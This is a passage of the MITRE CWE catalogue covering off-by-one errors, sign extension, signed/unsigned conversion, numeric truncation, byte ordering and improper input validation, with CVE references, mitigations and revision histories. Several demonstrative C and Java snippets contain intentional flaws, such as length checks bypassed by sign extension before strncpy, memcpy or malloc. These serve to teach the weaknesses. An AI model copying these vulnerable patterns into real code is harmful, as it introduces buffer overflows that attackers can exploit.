Off-by-one error allows read of sensitive memory via a malformed request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0625 - - - CVE-2006-4574 - Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574 - - - - - Off-by-one Error - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - - - - - - - - - - - - This is not always a buffer overflow. For example, an off-by-one error could be a factor in a partial comparison, a read from the wrong memory location, an incorrect conditional, etc. - Under-studied. It requires careful code analysis or black box testing, where inputs of excessive length might not cause an error. Off-by-ones are likely triggered by extensive fuzzing, with the attendant diagnostic problems. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Common_Consequences, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated References - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-06-20 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses. - - - - - - - - - - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Other - Read Memory - Modify Memory - Other - When an unexpected sign extension occurs in code that operates directly on memory buffers, such as a size value or a memory index, then it could cause the program to write or read outside the boundaries of the intended buffer. If the numeric value is associated with an application-level resource, such as a quantity or price for a product in an e-commerce site, then the sign extension could produce a value that is much higher (or lower) than the application's allowable range. - - - - - Implementation - Avoid using signed variables if you don't need to represent negative values. When negative values are needed, perform validation after you save those values to larger data types, or before passing them to functions that are expecting unsigned values. - - - - - The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of "short s" is forced in this particular example, short int's are frequently used within real-world code, such as code that processes structured data. - - int GetUntrustedInt () {return(0x0000FFFF);} - void main (int argc, char **argv) { - char path[256];char *input;int i;short s;unsigned int sz; - i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {DiePainfully("go away!\n");} - /* s is sign-extended and saved in sz */sz = s; - /* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf("i=%d, s=%d, sz=%u\n", i, s, sz); - input = GetUserInput("Enter pathname:"); - /* strncpy interprets s as unsigned int, so it's treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = '\0'; /* don't want CWE-170 */printf("Path is: %s\n", path); - } - - This code first exhibits an example of CWE-839, allowing "s" to be a negative number. When the negative short "s" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119). - - - - - CVE-2018-10887 - Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887 - - - CVE-1999-0234 - Sign extension error produces -1 value that is treated as a command separator, enabling OS command injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0234 - - - CVE-2003-0161 - Product uses "char" type for input character. When char is implemented as a signed type, ASCII value 0xFF (255), a sign extension produces a -1 value that is treated as a program-specific separator value, effectively disabling a length check and leading to a buffer overflow. This is also a multiple interpretation error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161 - - - CVE-2007-4988 - chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988 - - - CVE-2006-1834 - chain: signedness error allows bypass of a length check; later sign extension makes exploitation easier. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1834 - - - CVE-2005-2753 - Sign extension when manipulating Pascal-style strings leads to integer overflow and improper memory copy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2753 - - - - - Sign extension error - - - SFP1 - Glitch in computation - - - INT31-C - Ensure that integer conversions do not result in lost or misinterpreted data - CWE More Specific - - - - - - - - - Sign extension errors can lead to buffer overflows and other memory-based problems. They are also likely to be factors in other weaknesses that are not based on memory operations, but rely on numeric calculation. - This entry is closely associated with signed-to-unsigned conversion errors (CWE-195) and other numeric errors. These relationships need to be more closely examined within CWE. - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-05 - complete rewrite of the entire entry - - - CWE Content Team - MITRE - 2008-11-24 - updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations, References - - Sign Extension Error - Incorrect Sign Extension - - - - The software uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive. - - It is dangerous to rely on implicit casts between signed and unsigned numbers because the result can take on an unexpected value and violate assumptions made by the program. - Often, functions will return negative values to indicate a failure. When the result of a function is to be used as a size parameter, using these negative return values can have unexpected results. For example, if negative size values are passed to the standard memory copy or allocation functions they will be implicitly cast to a large unsigned value. This may lead to an exploitable buffer overflow or underflow condition. - - - - - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - Conversion between signed and unsigned values can lead to a variety of errors, but from a security standpoint is most commonly associated with integer overflow and buffer overflow vulnerabilities. - - - - - In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned. - - unsigned int readdata () {int amount = 0;...if (result == ERROR)amount = -1;...return amount;} - - If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. - - - In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number. - - unsigned int readdata () {int amount = 0;...amount = accessmainframe();...return amount;} - - If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. - - - The following code is intended to read an incoming packet from a socket and extract one or more headers. - - DataPacket *packet;int numHeaders;PacketHeader *headers; - sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; - if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); - - The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. - - - This example processes user input comprised of a series of variable-length structures. The first 2 bytes of input dictate the size of the structure to be processed. - - char* processNext(char* strm) {char buf[512];short len = *(short*) strm;strm += sizeof(len);if (len <= 512) {memcpy(buf, strm, len);process(buf);return strm + len;}else {return -1;}} - - The programmer has set an upper bound on the structure size: if it is larger than 512, the input will not be processed. The problem is that len is a signed short, so the check against the maximum structure length is done with signed values, but len is converted to an unsigned integer for the call to memcpy() and the negative bit will be extended to result in a huge value for the unsigned integer. If len is negative, then it will appear that the structure has an appropriate size (the if branch will be taken), but the amount of memory copied by memcpy() will be quite large, and the attacker will be able to overflow the stack with data in strm. - - - In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: - - int returnChunkSize(void *) { - - - /* if chunk info is valid, return the size of usable memory, - - - * else, return -1 to indicate an error - - - */ - ... - }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} - - If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). - - - This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. - - int proc_msg(char *s, int msg_len) - { - - // Note space at the end of the string - assume all strings have preamble with space - int pre_len = sizeof("preamble: "); - char buf[pre_len - msg_len]; - ... Do processing here if we get this far - - } - char *s = "preamble: message\n"; - char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) - int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length - int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack - - The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations. - - - - - CVE-2007-4268 - Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268 - - - - - Signed to unsigned conversion error - - - SFP1 - Glitch in computation - - - INT31-C - Ensure that integer conversions do not result in lost or misinterpreted data - CWE More Specific - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, References - - - - - The software uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive. - Although less frequent an issue than signed-to-unsigned conversion, unsigned-to-signed conversion can be the perfect precursor to dangerous buffer underwrite conditions that allow attackers to move down the stack where they otherwise might not have access in a normal buffer overflow condition. Buffer underwrites occur frequently when large unsigned values are cast to signed values, and then used as indexes into a buffer or for pointer arithmetic. - - - - - - - - - - - - - - Implementation - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - Incorrect sign conversions generally lead to undefined behavior, and therefore crashes. - - - Integrity - Modify Memory - If a poor cast lead to a buffer overflow or similar condition, data integrity may be affected. - - - Integrity - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Improper signed-to-unsigned conversions without proper checking can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. - - - - - Requirements - Choose a language which is not subject to these casting flaws. - - - Architecture and Design - Design object accessor functions to implicitly check values for valid sizes. Ensure that all functions which will be used as a size are checked previous to use as a size. If the language permits, throw exceptions rather than using in-band errors. - - - Implementation - Error check the return values of all functions. Be aware of implicit casts made, and use unsigned variables for sizes if at all possible. - - - - - Unsigned to signed conversion error - - - SFP1 - Glitch in computation - - - - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - - - - Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion. - When a primitive is cast to a smaller primitive, the high order bits of the large value are lost in the conversion, potentially resulting in an unexpected value that is not equal to the original value. This value may be required as an index into a buffer, a loop iterator, or simply necessary state data. In any case, the value cannot be trusted and the system will be in an undefined state. While this method may be employed viably to isolate the low bits of a value, this usage is rare, and truncation usually implies that an implementation error has occurred. - - - - - - - - - - - - - - - - - - Implementation - - - Low - - - Integrity - Modify Memory - The true value of the data is lost and corrupted data is used. - - - - - Implementation - Ensure that no casts, implicit or explicit, take place that move from a larger size primitive or a smaller size primitive. - - - - - This example, while not exploitable, shows the possible mangling of values associated with truncation errors: - - int intPrimitive;short shortPrimitive;intPrimitive = (int)(~((int)0) ^ (1 << (sizeof(int)*8-1)));shortPrimitive = intPrimitive;printf("Int MAXINT: %d\nShort MAXINT: %d\n", intPrimitive, shortPrimitive); - - The above code, when compiled and run on certain systems, returns the following output: - - Int MAXINT: 2147483647Short MAXINT: -1 - - This problem may be exploitable when the truncated value is used as an array index, which can happen implicitly when 64-bit values are used as indexes, as they are truncated to 32 bits. - - - In the following Java example, the method updateSalesForProduct is part of a business application class that updates the sales information for a particular product. The method receives as arguments the product ID and the integer amount sold. The product ID is used to retrieve the total product count from an inventory object which returns the count as an integer. Before calling the method of the sales object to update the sales count the integer values are converted to The primitive type short since the method requires short type for the method arguments. - - ... - // update sales database for number of product sold with product ID - public void updateSalesForProduct(String productID, int amountSold) { - - - // get the total number of products in inventory database - int productCount = inventory.getProductCount(productID); - // convert integer values to short, the method for the - - - // sales object requires the parameters to be of type short - short count = (short) productCount;short sold = (short) amountSold; - // update sales database for product - sales.updateSalesCount(productID, count, sold); - }... - - However, a numeric truncation error can occur if the integer values are higher than the maximum value allowed for the primitive type short. This can cause unexpected results or loss or corruption of data. In this case the sales database may be corrupted with incorrect data. Explicit casting from a from a larger size primitive type to a smaller size primitive type should be prevented. The following example an if statement is added to validate that the integer values less than the maximum value for the primitive type short before the explicit cast and the call to the sales method. - - ... - // update sales database for number of product sold with product ID - public void updateSalesForProduct(String productID, int amountSold) { - - - // get the total number of products in inventory database - int productCount = inventory.getProductCount(productID); - // make sure that integer numbers are not greater than - - - // maximum value for type short before converting - if ((productCount < Short.MAX_VALUE) && (amountSold < Short.MAX_VALUE)) { - - - // convert integer values to short, the method for the - - - // sales object requires the parameters to be of type short - short count = (short) productCount;short sold = (short) amountSold; - // update sales database for product - sales.updateSalesCount(productID, count, sold); - - else { - // throw exception or perform other processing - - ...} - }... - - - - - - CVE-2009-0231 - Integer truncation of length value leads to heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231 - - - CVE-2008-3282 - Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282 - - - - - Numeric truncation error - - - Truncation error - - - FIO34-C - Distinguish between characters read from a file and EOF or WEOF - CWE More Abstract - - - FLP34-C - Ensure that floating point conversions are within range of the new type - CWE More Abstract - - - INT02-C - Understand integer conversion rules - - - INT05-C - Do not use input functions to convert character data if they cannot handle all possible inputs - - - INT31-C - Ensure that integer conversions do not result in lost or misinterpreted data - CWE More Abstract - - - NUM12-J - Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data - - - SFP1 - Glitch in computation - - - - - - - This weakness has traditionally been under-studied and under-reported, although vulnerabilities in popular software have been published in 2008 and 2009. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Observed_Examples, Other_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - Black Box - Because byte ordering bugs are usually very noticeable even with normal inputs, this bug is more likely to occur in rarely triggered error conditions, making them difficult to detect using black box methods. - - - - - Numeric Byte Ordering Error - - - FIO12-J - Provide methods to read and write little-endian data - - - - Under-reported. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Detection_Factors, Relationships, Research_Gaps, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - Numeric Byte Ordering Error - - - - The product receives input or data, but it does - not validate or incorrectly validates that the input has the - properties that are required to process the data safely and - correctly. - - Input validation is a frequently-used technique - for checking potentially dangerous inputs in order to - ensure that the inputs are safe for processing within the - code, or when communicating with other components. When - software does not validate input properly, an attacker is - able to craft the input in a form that is not expected by - the rest of the application. This will lead to parts of the - system receiving unintended input, which may result in - altered control flow, arbitrary control of a resource, or - arbitrary code execution. - Input validation is not the only technique for - processing input, however. Other techniques attempt to - transform potentially-dangerous input into something safe, such - as filtering (CWE-790) - which attempts to remove dangerous - inputs - or encoding/escaping (CWE-116), which attempts to - ensure that the input is not misinterpreted when it is included - in output to another component. Other techniques exist as well - (see CWE-138 for more examples.) - Input validation can be applied to: - - raw data - strings, numbers, parameters, file contents, etc. - metadata - information about the raw data, such as headers or size - - Data can be simple or structured. Structured data - can be composed of many nested layers, composed of - combinations of metadata and raw data, with other simple or - structured data. - Many properties of raw data or metadata may need - to be validated upon entry into the code, such - as: - - specified quantities such as size, length, frequency, price, rate, number of operations, time, etc. - implied or derived quantities, such as the actual size of a file instead of a specified size - indexes, offsets, or positions into more complex data structures - symbolic keys or other elements into hash tables, associative arrays, etc. - well-formedness, i.e. syntactic correctness - compliance with expected syntax - lexical token correctness - compliance with rules for what is treated as a token - specified or derived type - the actual type of the input (or what the input appears to be) - consistency - between individual data elements, between raw data and metadata, between references, etc. - conformance to domain-specific rules, e.g. business logic - equivalence - ensuring that equivalent inputs are treated the same - authenticity, ownership, or other attestations about the input, e.g. a cryptographic signature to prove the source of the data - - Implied or derived properties of data must often - be calculated or inferred by the code itself. Errors in - deriving properties may be considered a contributing factor - to improper input validation. - - Note that "input validation" has very different - meanings to different people, or within different - classification schemes. Caution must be used when - referencing this CWE entry or mapping to it. For example, - some weaknesses might involve inadvertently giving control - to an attacker over an input when they should not be able - to provide an input at all, but sometimes this is referred - to as input validation. - Finally, it is important to emphasize that the - distinctions between input validation and output escaping - are often blurred, and developers must be careful to - understand the difference, including how input validation - is not always sufficient to prevent vulnerabilities, - especially when less stringent data types must be - supported, such as free-form text. Consider a SQL injection - scenario in which a person's last name is inserted into a - query. The name "O'Reilly" would likely pass the validation - step since it is a common last name in the English - language. However, this valid name cannot be directly - inserted into the database because it contains the "'" - apostrophe character, which would need to be escaped or - otherwise transformed. In this case, removing the - apostrophe might reduce the risk of SQL injection, but it - would produce incorrect behavior because the wrong name - would be recorded. - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields can not be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602). - - - - High - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU. - - - Confidentiality - Read Memory - Read Files or Directories - An attacker could read confidential data if they are able to control resource references. - - - Integrity - Confidentiality - Availability - Modify Memory - Execute Unauthorized Code or Commands - An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution. - - - - - Automated Static Analysis - - Some instances of improper input validation can be detected using automated static analysis. - A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present. - Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. - - - - Manual Static Analysis - When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented. - - - Fuzzing - Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Fuzz Tester - Framework-based Fuzzer - - - Cost effective for partial coverage: - - - Host Application Interface Scanner - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - Attack Surface Reduction - Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111] - - - Architecture and Design - Libraries or Frameworks - Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173). - - - Architecture and Design - Implementation - Attack Surface Reduction - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - High - - - Architecture and Design - - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings. - - - - Implementation - When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined. - - - Implementation - Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow. - - - Implementation - Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained. - - - Implementation - - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control. - Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content. - - - - Implementation - When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so. - - - - - This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated. 